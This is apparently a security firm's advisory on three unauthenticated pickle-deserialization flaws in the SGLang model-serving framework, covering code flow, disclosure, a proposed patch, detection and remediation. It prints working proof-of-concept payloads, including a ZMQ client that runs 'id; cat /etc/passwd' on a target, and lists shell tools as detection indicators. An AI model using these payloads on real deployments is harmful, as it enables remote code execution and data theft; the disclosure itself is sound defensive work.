
Key Takeaways
- SGLang, an open-source AI/ML framework, contains multiple unsafe deserialization vulnerabilities (CVE-2026-3059, CVE-2026-3060, and CVE-2026-3989) that allow unauthenticated remote code execution, posing a significant risk to users and developers of AI applications.
- These vulnerabilities are critical because they let attackers execute arbitrary code without authentication, potentially exposing sensitive data and compromising entire environments. With the growing reliance on AI and machine learning, the implications for security and data integrity are substantial.
- The impacted parties include organizations that deploy AI applications with SGLang, as well as the broader AI/ML developer and research community, which faces elevated risk from the widespread use of unsafe Python serialization methods such as pickle.
Orca Security identified multiple unsafe deserialization vulnerabilities in SGLang, a widely used AI/ML framework. Three CVEs have been assigned for unauthenticated remote code execution and insecure deserialization; the maintainers have not responded to disclosure efforts, and no patch is available.
The Orca Security Research Pod continuously investigates the security posture of widely adopted AI/ML infrastructure. During a focused audit of LLM serving frameworks, I discovered multiple unsafe deserialization vulnerabilities in SGLang, a popular open-source framework for serving large language models and multimodal AI models. These findings were coordinated through CERT/CC (case VU#665416), with additional analysis contributed by CERT/CC vulnerability researcher Christopher Cullen.
Three CVEs have been assigned: CVE-2026-3059, CVE-2026-3060, and CVE-2026-3989. The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network. The third involves insecure deserialization in a crash dump replay utility. At the time of publication, the SGLang maintainers have not responded to coordinated disclosure efforts, and no official patch is available.
Quick Overview
| Attribute | CVE-2026-3059 | CVE-2026-3060 | CVE-2026-3989 |
|---|---|---|---|
| Component | Multimodal generation ZMQ broker (`scheduler_client.py`) | Disaggregation encoder receiver (`encode_receiver.py`) | Crash dump replay script (`replay_request_dump.py`) |
| CWE | CWE-502 (Deserialization of Untrusted Data) | CWE-502 (Deserialization of Untrusted Data) | CWE-502 (Deserialization of Untrusted Data) |
| CVSS 3.1 | 9.8 Critical | 9.8 Critical | 7.8 High |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| Attack Vector | Network | Network | Local |
| Authentication | None | None | None |
| User Interaction | None | None | Required |
| Affected Versions | ≥ 0.5.5 through latest (0.5.9 at time of publication) | All versions with disaggregation module | All versions containing replay_request_dump.py |
| Fix Available | No | No | No |
CVSS Rationale
CVE-2026-3059 and CVE-2026-3060 score 9.8 because the ZMQ broker binds to all available network interfaces (tcp://*) by default with zero authentication, and the pickle.loads() call executes immediately on any received payload. An attacker with network access to the exposed port needs nothing else – no credentials, no user interaction, no complex race conditions. The result is full code execution in the context of the SGLang process. This is a textbook unauthenticated network RCE.
Note: The 9.8 base score reflects severity when the affected feature is active. The multimodal generation and disaggregation modules must be explicitly enabled; default text-only SGLang deployments do not expose the vulnerable broker.
CVE-2026-3989 scores 7.8 High (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). While the impact upon execution is the same as the network RCEs – full arbitrary code execution – the attack prerequisites are meaningfully different. This is a debugging utility in a scripts/playground/ directory; exploitation requires an attacker to plant a malicious .pkl file where an operator will manually load it, via write access to a crash dump directory or social engineering. It underscores the systemic nature of unsafe pickle usage throughout the SGLang codebase.
What Is SGLang?
SGLang is an open-source serving framework developed by LMSYS for running large language models and multimodal AI models in production. It supports a wide range of popular models – including Qwen, DeepSeek, Mistral, and Skywork – and provides OpenAI-compatible API endpoints. SGLang is designed for high-throughput, low-latency inference and is used across research labs and production deployments. In most production environments, SGLang runs inside containerized GPU inference infrastructure – Kubernetes pods, Docker containers, or dedicated GPU nodes. Compromising an SGLang instance could expose model weights, inference data, API credentials, GPU workloads, and potentially provide a pivot point into the surrounding cluster environment.
Technical Analysis
Root Cause: Python’s pickle on Untrusted Network Data
All three vulnerabilities share a single root cause: the use of Python’s pickle module to deserialize data from untrusted sources.
Python’s own documentation explicitly warns that the pickle module is not secure and should never be used to deserialize untrusted data. The reason is fundamental to how pickle works – a pickle stream doesn’t just encode data, it encodes instructions for reconstructing Python objects. An attacker can craft a pickle payload whose reconstruction instructions include arbitrary function calls, achieving full code execution the moment pickle.loads() runs.
This is not a novel class of vulnerability. The same pattern has led to RCE in other ML serving frameworks, notably CVE-2024-9053 in vLLM and CVE-2025-10164 in a previous SGLang component. The persistence of pickle-based deserialization in ML tooling is a systemic problem, and SGLang’s codebase contains over 20 instances of pickle.loads() across different modules.
How Pickle Deserialization Becomes Code Execution
For readers less familiar with Python internals, it’s worth understanding why pickle.loads() on untrusted data is equivalent to eval().
When Python pickles an object, it stores instructions for how to rebuild that object later. These instructions include which callable to invoke and what arguments to pass. The __reduce__ method on a Python class controls this process – it tells pickle how to “reduce” an object to a reconstructable form. Critically, the callable specified in __reduce__ is not restricted to constructors. It can be any callable, including os.system, subprocess.Popen, or eval.
Here is the core of our proof-of-concept payload:
```python
import os

class RCEPayload:
    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        # pickle will call os.system(self.cmd) during deserialization
        return (os.system, (self.cmd,))
```
When pickle.loads() processes a serialized RCEPayload, it doesn’t reconstruct an RCEPayload instance. Instead, it calls os.system(cmd), executing an arbitrary shell command. The pickle protocol faithfully follows the stored instructions with no sandboxing, no allowlisting, and no type checking.
The serialized payload is just bytes on the wire. There’s nothing in the pickle bytestream that distinguishes “safe data” from “malicious instruction.” From the ZMQ broker’s perspective, it receives bytes, calls pickle.loads(), and execution happens before any application-level validation could occur.
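This behavior is easy to verify with a self-contained snippet. Here `print` stands in for `os.system` as a harmless callable: `pickle.loads()` invokes it during deserialization and returns its result instead of a reconstructed object.

```python
import pickle

class Demo:
    def __reduce__(self):
        # pickle records this callable and its args; loads() will invoke it
        return (print, ("callable invoked during pickle.loads",))

blob = pickle.dumps(Demo())
result = pickle.loads(blob)  # prints the message; result is print's return value
print(result is None)        # True: no Demo instance was ever rebuilt
```

Swapping `print` for `os.system` is the entire distance between this demo and a working exploit.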
CVE-2026-3059: Multimodal Generation Broker – Full Code Flow
To understand the attack surface, we need to trace the complete path from server startup to deserialization.
Step 1: Server Launch
When an operator starts SGLang’s diffusion server:
```shell
python -m sglang.multimodal_gen.runtime.launch_server \
    --model-path stabilityai/stable-diffusion-3-medium \
    --port 8000
```
The FastAPI application lifecycle hook automatically starts the ZMQ broker as a background task:
```python
@asynccontextmanager
async def lifespan(app: FastAPI):
    # ...
    broker_task = asyncio.create_task(run_zeromq_broker(server_args))
    yield
    broker_task.cancel()
```
The broker starts automatically as part of the application lifecycle when the multimodal server is running.
Step 2: Broker Binds to All Interfaces
The broker opens a ZeroMQ REP socket and binds to tcp://*:{broker_port}:
```python
async def run_zeromq_broker(server_args: ServerArgs):
    ctx = zmq.asyncio.Context()
    socket = ctx.socket(zmq.REP)
    broker_endpoint = f"tcp://*:{server_args.broker_port}"  # ALL interfaces
    socket.bind(broker_endpoint)
```
The tcp://* binding means the broker listens on all available network interfaces – 127.0.0.1, the machine’s LAN IP, any public IP, and any container/pod network interface. The broker port defaults to http_port + 1. In the launch example above (--port 8000), the broker listens on port 8001. With SGLang’s default HTTP port of 30000, the broker would be on port 30001.
Although broker_host exists as a field in ServerArgs, the original code ignores it and hardcodes the binding to *.
Step 3: Direct Deserialization of Network Data
The broker’s main loop receives raw bytes and passes them directly to pickle.loads():
```python
while True:
    try:
        payload = await socket.recv()
        request_batch = pickle.loads(payload)  # <-- RCE here
        logger.info("Broker received an offline job from a client.")
        response_batch = await async_scheduler_client.forward(request_batch)
        await socket.send(pickle.dumps(response_batch))
    except Exception as e:
        logger.error(f"Error in ZMQ Broker: {e}", exc_info=True)
        try:
            await socket.send(pickle.dumps({"status": "error", "message": str(e)}))
        except Exception:
            pass
```
There are zero security boundaries between socket.recv() and pickle.loads(). No authentication check. No message format validation. No source IP filtering. No TLS. The ZMQ REP socket accepts connections from any source, and the first thing the code does with the received bytes is deserialize them with pickle.
Note also that the exception handler catches the error after the payload has already been deserialized and executed – the except block cannot prevent the RCE, it only handles downstream errors.
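A small experiment makes this concrete. The snippet below is illustrative, not SGLang code: the payload's side effect lands before the exception it raises, so a surrounding `try/except` observes the error only after the damage is done.

```python
import pickle

log = []

def run_then_fail(msg):
    log.append(msg)             # side effect: stands in for attacker code
    raise RuntimeError("boom")  # the only thing the except block ever sees

class Payload:
    def __reduce__(self):
        return (run_then_fail, ("payload executed",))

try:
    pickle.loads(pickle.dumps(Payload()))
except RuntimeError:
    pass  # handler runs too late: the side effect already happened

print(log)  # ['payload executed']
```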
Step 4: Exploitation
From the attacker’s side, the exploit is minimal – a standard ZMQ REQ socket and a pickle payload:
```python
import pickle
import zmq

ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect(f"tcp://{target}:{port}")
payload = pickle.dumps(RCEPayload("id; cat /etc/passwd"))
sock.send(payload)
```
This is a single-message exploit. The attacker connects, sends one ZMQ message, and the command executes. The ZMQ REP/REQ pattern even sends a response back, confirming that the broker processed the message.
CVE-2026-3060: Disaggregation Encoder Receiver
The same pickle deserialization pattern exists in a completely separate component – SGLang’s encoder parallel disaggregation system in encode_receiver.py (lines 202 and 643).
This module is activated when a user passes the --encoder-transfer-backend zmq_to_scheduler flag, enabling ZMQ-based transfer between encoder and scheduler components. Like the multimodal broker, it binds a ZMQ socket to tcp://* and calls pickle.loads() on incoming payloads without authentication.
The attack mechanics are identical to CVE-2026-3059, but the code is maintained by a different team within the SGLang project (@ByronHsu, @hnyls2002, @ShangmingCai). This is worth noting because it means patches – if they ever arrive – may land on different timelines for the two components.
CVE-2026-3989: Crash Dump Replay Script
The replay_request_dump.py utility in scripts/playground/ loads .pkl files with pickle.load() and no validation:
```python
def read_records(files):
    records = []
    for f in files:
        tmp = pickle.load(open(f, "rb"))
        if isinstance(tmp, dict) and "requests" in tmp:
            records.extend(tmp["requests"])
        else:
            records.extend(tmp)
    return records
```
The script is designed to replay crash dumps generated by SGLang when --crash-dump-folder is configured. Here’s the attack scenario in concrete terms:
- SGLang writes crash dump `.pkl` files to a configured directory (e.g., `/data/sglang_crash_dump/`).
- An attacker with write access to that directory – or who can supply a file via social engineering (“can you replay this crash dump for me?”) – drops a malicious `.pkl` file.
- The operator runs `python3 replay_request_dump.py --input-file /data/sglang_crash_dump/malicious.pkl`, and `pickle.load()` executes the attacker’s payload.
The PoC for this CVE (developed by CERT/CC) uses a payload that returns a valid {'requests': []} structure after executing its code, so the script continues running normally – the operator may not even notice the execution:
```python
class POC:
    def __reduce__(self):
        payload = (
            "(__import__('pathlib').Path('poc_marker.txt').write_text("
            "'pickle payload executed\\n', encoding='utf-8'), {'requests': []})[1]"
        )
        return (eval, (payload,))
```
Proposed Patch Analysis
As part of the coordinated disclosure, CERT/CC vulnerability researcher Christopher Cullen developed a proposed patch with two changes:
Change 1: Localhost binding (effective)
```python
# Original: binds to all interfaces
broker_endpoint = f"tcp://*:{server_args.broker_port}"

# Patched: binds to localhost by default
host = server_args.broker_host or "127.0.0.1"
broker_endpoint = f"tcp://{host}:{server_args.broker_port}"
```
This eliminates remote exploitation entirely. Even if pickle deserialization remains, an attacker would need local access to the machine.
Change 2: msgpack serialization with pickle fallback (partial)
The patch introduces _pack() / _unpack() functions that prefer msgpack but fall back to pickle:
```python
def _unpack(b: bytes) -> Any:
    try:
        return _from_basic(msgpack.unpackb(b, raw=False))
    except Exception:
        return pickle.loads(b)  # Fallback still vulnerable
```
This is a pragmatic transition mechanism – it allows existing pickle-speaking components to continue working while new messages use msgpack. However, the fallback means that an attacker who crafts a payload that deliberately fails msgpack parsing (which any valid pickle stream will) still reaches pickle.loads().
With the localhost binding in place, this is a local-only risk and acceptable for a transitional fix. Without the localhost binding, the msgpack wrapper alone would not prevent remote exploitation.
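The failure mode is easy to demonstrate without msgpack installed, since any strict format plays the same role. In this sketch (names ours), stdlib `json` stands in for msgpack: a pickle bytestream fails strict parsing, which is exactly the branch the vulnerable fallback hands to `pickle.loads()` – a safe `_unpack` must raise instead.

```python
import json
import pickle

def unpack_strict(b: bytes):
    """Reject anything that is not valid JSON -- no pickle fallback."""
    return json.loads(b.decode("utf-8"))

pickle_blob = pickle.dumps({"requests": []})

try:
    unpack_strict(pickle_blob)
    rejected = False
except (UnicodeDecodeError, json.JSONDecodeError):
    rejected = True  # the stream is refused rather than deserialized

print(rejected)  # True
```

The pickle framing bytes are not valid UTF-8, so strict parsing always fails on them; the security question is only what the `except` branch does next.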
The synchronous SchedulerClient class also still uses send_pyobj() / recv_pyobj() (ZMQ’s built-in pickle-based methods), but these connect to internal scheduler endpoints rather than the exposed broker, making them lower priority.
The real fix: Both changes together are effective as an immediate mitigation. The long-term fix requires replacing all 20+ pickle.loads() instances throughout the codebase with safe serialization – a significant engineering effort that the vendor would need to own.
Attack Flow (CVE-2026-3059 / CVE-2026-3060)
- The target runs SGLang with multimodal generation or disaggregation features enabled.
- The ZMQ broker binds to `tcp://*:{port}`, accessible from the network.
- The attacker connects to the exposed port and sends a pickle payload containing a malicious `__reduce__` method.
- SGLang calls `pickle.loads()` on the payload, triggering arbitrary code execution.
- The attacker has code execution with the full privileges of the SGLang process.
No authentication. No headers. No API keys. Just a raw TCP connection and a pickle bytestream.
Affected Versions
| Component | Introduced | Affected Range | Fixed Version |
|---|---|---|---|
| `multimodal_gen` (CVE-2026-3059) | Commit 7bc1dae09 (2025-11-05) | ≥ 0.5.5 through latest (0.5.9+) | None |
| Disaggregation module (CVE-2026-3060) | Present in all versions with ZMQ disaggregation | All versions with feature | None |
| `replay_request_dump.py` (CVE-2026-3989) | Present since script creation | All versions | None |
Disclosure Timeline
| Date | Event |
|---|---|
| 2026-02-04 | Vulnerability discovered by Igor Stepansky (Orca Security) |
| 2026-02-04 | GitHub Security Advisory (GHSA-3cp7-c6q2-94xr) submitted to SGLang |
| 2026-02-04 | Report submitted to CERT/CC |
| 2026-02-09 | CERT/CC creates case VU#665416; vendor invited |
| 2026-02-09 | PoC files uploaded and validated |
| 2026-02-10 | CERT/CC confirms disclosure date of March 26, 2026 |
| 2026-02-17 | CERT/CC reaches out directly to SGLang maintainers; no response |
| 2026-02-23 | CVE-2026-3059 and CVE-2026-3060 assigned; CERT/CC indicates plans to contact CISA for additional assistance |
| 2026-03-02 | CERT/CC develops proposed patch (msgpack + localhost binding) |
| 2026-03-03 | GHSA-wxjp-55q2-vg27 opened with patch proposal |
| 2026-03-11 | CVE-2026-3989 identified by CERT/CC (Christopher Cullen); CVE assigned |
Despite multiple contact attempts through GitHub Security Advisories and direct email by CERT/CC – including outreach to CISA for assistance – the SGLang maintainers did not respond at any point during the coordination process. No vendor statement was obtained, and no official patch has been released.
Threat Status
Active Exploitation: No exploitation of these specific vulnerabilities has been observed in the wild at the time of publication.
PoC Availability: Functional proof-of-concept code for CVE-2026-3059 and CVE-2026-3060 exists and was shared with CERT/CC during coordination. A PoC for CVE-2026-3989 was developed by CERT/CC. Given the trivial nature of pickle deserialization exploits, weaponization requires minimal effort.
Important context: The multimodal generation and disaggregation features must be explicitly enabled for CVE-2026-3059 and CVE-2026-3060 to be exploitable. Default SGLang text-only inference deployments are not affected by these two CVEs. However, any deployment running multimodal_gen or disaggregation with ZMQ transport is immediately vulnerable if the broker port is network-reachable.
Detection Guidance
Network-level indicators for CVE-2026-3059 / CVE-2026-3060:
- Monitor for unexpected inbound TCP connections to the ZMQ broker port (default: `http_port + 1`). ZMQ traffic on this port from external or untrusted source IPs is anomalous.
- ZMQ uses a specific wire protocol – a ZMTP handshake followed by message frames. Network IDS signatures for ZMTP on unexpected ports can flag exposure.
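As one hedged example of keying on the handshake, a ZMTP 3.x greeting begins with a fixed 10-byte signature: 0xFF, eight arbitrary padding bytes, then 0x7F (per the ZMTP/3.0 specification). The helper below is illustrative tooling of our own, not part of SGLang; it classifies the first bytes of a captured connection.

```python
def looks_like_zmtp(greeting: bytes) -> bool:
    """ZMTP 3.x signature: 0xFF, 8 arbitrary padding bytes, then 0x7F."""
    return (
        len(greeting) >= 10
        and greeting[0] == 0xFF
        and greeting[9] == 0x7F
    )

# bytes as they might appear at the start of a captured ZMQ connection
print(looks_like_zmtp(b"\xff" + b"\x00" * 8 + b"\x7f"))  # True
print(looks_like_zmtp(b"GET / HTTP/1.1\r\n"))            # False
```

The same pattern translates directly into an IDS signature for flagging ZMTP on ports where no broker should be listening.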
Host-level indicators:
- Unexpected child processes spawned by the SGLang Python process (e.g., `/bin/sh`, `curl`, `wget`, `nc`).
- File creation in unusual locations by the SGLang process (e.g., `/tmp/pwned`, reverse shell scripts).
- Outbound connections from the SGLang process to unexpected destinations.
Remediation
Immediate actions:
- Network segmentation. Ensure ZMQ broker ports (default: `http_port + 1`) are not exposed to untrusted networks. Use firewall rules to restrict access to localhost or known internal clients only.
- Review deployment flags. If you are not using multimodal generation or disaggregation features, ensure they are not enabled.
- Audit crash dump handling. Do not run `replay_request_dump.py` on `.pkl` files from untrusted sources or shared directories with weak permissions.
Proposed Patch (Unmerged)
As detailed in the Patch Analysis section above, CERT/CC vulnerability researcher Christopher Cullen developed a proposed patch that binds the ZMQ broker to localhost by default and replaces pickle with msgpack serialization (with a transitional pickle fallback). This patch has been submitted to the SGLang maintainers via GitHub Security Advisory GHSA-wxjp-55q2-vg27 but has not been merged. Users may apply similar mitigations manually.
Long-Term Recommendation
SGLang’s codebase contains more than 20 instances of pickle.loads() and related unsafe deserialization calls. A comprehensive audit and migration to safe serialization formats (msgpack, JSON, or Protocol Buffers) is necessary to address the systemic risk.
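As a sketch of that migration direction (stdlib `json` here; msgpack or Protocol Buffers follow the same shape, and all function names are illustrative), a schema-checked codec reconstructs only plain data and can never be steered into calling a function:

```python
import json

def pack_batch(batch: dict) -> bytes:
    # JSON encodes only plain data (dicts, lists, strings, numbers), so the
    # wire format carries no object-reconstruction instructions to execute
    return json.dumps(batch).encode("utf-8")

def unpack_batch(raw: bytes) -> dict:
    obj = json.loads(raw.decode("utf-8"))
    if not isinstance(obj, dict) or not isinstance(obj.get("requests"), list):
        raise ValueError("malformed request batch")
    return obj

wire = pack_batch({"requests": [{"prompt": "hello"}]})
batch = unpack_batch(wire)
print(batch["requests"][0]["prompt"])  # hello
```

The cost is that every message type needs an explicit schema; the benefit is that deserialization becomes a parsing problem rather than a code execution problem.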
The Bigger Picture: Pickle in AI/ML Infrastructure
This is not an isolated finding. Unsafe pickle deserialization is arguably the most prevalent vulnerability class in the Python AI/ML ecosystem. The pattern repeats across model serving frameworks, training pipelines, model registries, and utility scripts.
The reason is understandable: pickle is convenient. It serializes arbitrary Python objects with zero schema definition. For fast-moving ML projects focused on model performance rather than security hardening, pickle is the path of least resistance. But that convenience comes at a cost – every pickle.loads() call on untrusted input is an implicit eval().
Organizations deploying open-source LLM serving infrastructure should audit their dependencies for pickle usage, restrict network access to internal communication endpoints, and treat any pickle deserialization of external data as a critical security boundary.
How Can Orca Help?
The Orca Platform secures AI as an evolution of its core capabilities: identifying, prioritizing, and remediating risk across cloud environments. With Orca, customers can:
- Inventory AI models, cloud-managed AI services, unmanaged apps, and other self-hosted AI frameworks
- Pinpoint where AI models and tools are running
- Detect sensitive data on the assets running AI projects, including training or fine-tuning datasets and other AI files
- Prioritize and remediate AI vulnerabilities and risks to AI workloads
To learn more or see the Orca Platform in action, schedule a personalized 1:1 demo.